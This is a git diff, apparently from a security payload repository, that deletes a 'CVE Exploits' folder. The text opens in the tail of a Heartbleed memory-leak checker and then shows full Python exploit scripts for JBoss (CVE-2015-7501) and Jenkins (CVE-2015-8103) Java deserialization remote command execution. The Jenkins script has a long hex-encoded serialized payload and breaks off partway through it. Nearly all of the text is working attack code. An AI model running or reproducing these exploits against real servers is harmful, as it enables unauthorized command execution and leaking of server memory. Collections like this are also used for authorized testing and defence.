= select.select([s], [], [], 5) - if s in r: - data = s.recv(remain) - # EOF? - if not data: - return None - rdata += data - remain -= len(data) - return rdata - -def recvmsg(s): - hdr = recvall(s, 5) - if hdr is None: - print('Unexpected EOF receiving record header - server closed connection') - return None, None, None - typ, ver, ln = struct.unpack('>BHH', hdr) - pay = recvall(s, ln, 10) - if pay is None: - print('Unexpected EOF receiving record payload - server closed connection') - return None, None, None - print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))) - return typ, ver, pay - -def hit_hb(s, dumpf, host, quiet): - while True: - typ, ver, pay = recvmsg(s) - if typ is None: - print('No heartbeat response received from '+host+', server likely not vulnerable') - return False - - if typ == 24: - if not quiet: print('Received heartbeat response:') - hexdump(pay, dumpf, quiet) - if len(pay) > 3: - print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!') - else: - print('Server '+host+' processed malformed heartbeat, but did not return any extra data.') - return True - - if typ == 21: - if not quiet: print('Received alert:') - hexdump(pay, dumpf, quiet) - print('Server '+ host +' returned error, likely not vulnerable') - return False - -def connect(host, port, quiet): - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - if not quiet: print('Connecting...') - sys.stdout.flush() - s.connect((host, port)) - return s - -def tls(s, quiet): - if not quiet: print('Sending Client Hello...') - sys.stdout.flush() - s.send(hello) - if not quiet: print('Waiting for Server Hello...') - sys.stdout.flush() - -def parseresp(s): - while True: - typ, ver, pay = recvmsg(s) - if typ == None: - print('Server closed connection without sending Server Hello.') - return 0 - # Look for server hello done message. - if typ == 22 and ord(pay[0]) == 0x0E: - return ver - -def check(host, port, dumpf, quiet, starttls): - response = False - if starttls: - try: - s = smtplib.SMTP(host=host,port=port) - s.ehlo() - s.starttls() - except smtplib.SMTPException: - print('STARTTLS not supported...') - s.quit() - return False - print('STARTTLS supported...') - s.quit() - s = connect(host, port, quiet) - s.settimeout(1) - try: - re = s.recv(1024) - s.send('ehlo starttlstest\r\n') - re = s.recv(1024) - s.send('starttls\r\n') - re = s.recv(1024) - except socket.timeout: - print('Timeout issues, going ahead anyway, but it is probably broken ...') - tls(s,quiet) - else: - s = connect(host, port, quiet) - tls(s,quiet) - - version = parseresp(s) - - if version == 0: - if not quiet: print("Got an error while parsing the response, bailing ...") - return False - else: - version = version - 0x0300 - if not quiet: print("Server TLS version was 1.%d\n" % version) - - if not quiet: print('Sending heartbeat request...') - sys.stdout.flush() - if (version == 1): - s.send(hbv10) - response = hit_hb(s,dumpf, host, quiet) - if (version == 2): - s.send(hbv11) - response = hit_hb(s,dumpf, host, quiet) - if (version == 3): - s.send(hbv12) - response = hit_hb(s,dumpf, host, quiet) - s.close() - return response - -def main(): - opts, args = options.parse_args() - if len(args) < 1: - options.print_help() - return - - print('Scanning ' + args[0] + ' on port ' + str(opts.port)) - for i in range(0,opts.num): - check(args[0], opts.port, opts.file, opts.quiet, opts.starttls) - -if __name__ == '__main__': - main() diff --git a/CVE Exploits/JBoss CVE-2015-7501.py b/CVE Exploits/JBoss CVE-2015-7501.py deleted file mode 100644 index 2ee8edc..0000000 --- a/CVE Exploits/JBoss CVE-2015-7501.py +++ /dev/null @@ -1,62 +0,0 @@ -#! /usr/bin/env python2 - -# Jboss Java Deserialization RCE (CVE-2015-7501) -# Made with <3 by @byt3bl33d3r - -from __future__ import print_function -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - -import argparse -import sys, os -#from binascii import hexlify, unhexlify -from subprocess import check_output - -ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] -ysoserial_path = None - -parser = argparse.ArgumentParser() -parser.add_argument('target', type=str, help='Target IP') -parser.add_argument('command', type=str, help='Command to run on target') -parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') -parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') - -if len(sys.argv) < 2: - parser.print_help() - sys.exit(1) - -args = parser.parse_args() - -if not args.ysoserial_path: - for path in ysoserial_default_paths: - if os.path.exists(path): - ysoserial_path = path -else: - if os.path.exists(args.ysoserial_path): - ysoserial_path = args.ysoserial_path - -if ysoserial_path is None: - print('[-] Could not find ysoserial JAR file') - sys.exit(1) - -if len(args.target.split(":")) != 2: - print('[-] Target must be in format IP:PORT') - sys.exit(1) - -if not args.command: - print('[-] You must specify a command to run') - sys.exit(1) - -ip, port = args.target.split(':') - -print('[*] Target IP: {}'.format(ip)) -print('[*] Target PORT: {}'.format(port)) - -gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) - -r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) - -if r.status_code == 200: - print('[+] Command executed successfully') - diff --git a/CVE Exploits/Jenkins CVE-2015-8103.py b/CVE Exploits/Jenkins CVE-2015-8103.py deleted file mode 100644 index 804736c..0000000 --- a/CVE Exploits/Jenkins CVE-2015-8103.py +++ /dev/null @@ -1,88 +0,0 @@ -#! /usr/bin/env python2 - -#Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103) -#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) -#Made with <3 by @byt3bl33d3r - -from __future__ import print_function -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - -import socket -import sys -import base64 -import argparse -import os -from subprocess import check_output - -ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] -ysoserial_path = None - -parser = argparse.ArgumentParser() -parser.add_argument('target', type=str, help='Target IP:PORT') -parser.add_argument('command', type=str, help='Command to run on target') -parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') -parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') - -if len(sys.argv) < 2: - parser.print_help() - sys.exit(1) - -args = parser.parse_args() - -if not args.ysoserial_path: - for path in ysoserial_default_paths: - if os.path.exists(path): - ysoserial_path = path -else: - if os.path.exists(args.ysoserial_path): - ysoserial_path = args.ysoserial_path - -if ysoserial_path is None: - print("[-] Could not find ysoserial JAR file") - sys.exit(1) - -if len(args.target.split(':')) != 2: - print('[-] Target must be in format IP:PORT') - sys.exit(1) - -if not args.command: - print('[-] You must specify a command to run') - sys.exit(1) - -host, port = args.target.split(':') - -print('[*] Target IP: {}'.format(host)) -print('[*] Target PORT: {}'.format(port)) -print('\n') - -print('[*] Retrieving the Jenkins CLI port') -#Query Jenkins over HTTP to find what port the CLI listener is on -r = requests.get('{}://{}:{}'.format(args.proto, host, port)) -cli_port = int(r.headers['X-Jenkins-CLI-Port']) - -#Open a socket to the CLI port -sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -server_address = (host, cli_port) -print('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port)) -sock.connect(server_address) - -# Send headers -headers='\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74' -print('[*] Sending headers') -sock.send(headers) - -data = sock.recv(1024) -print('[*] Received "{}"'.format(data)) - -if data.find('JENKINS REMOTING CAPACITY') == -1: - data = sock.recv(1024) - print('[*] Received "{}"'.format(data)) - -payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command]) -payload_b64 = base64.b64encode(payloadObj) -payload='\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'+payload_b64+'\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x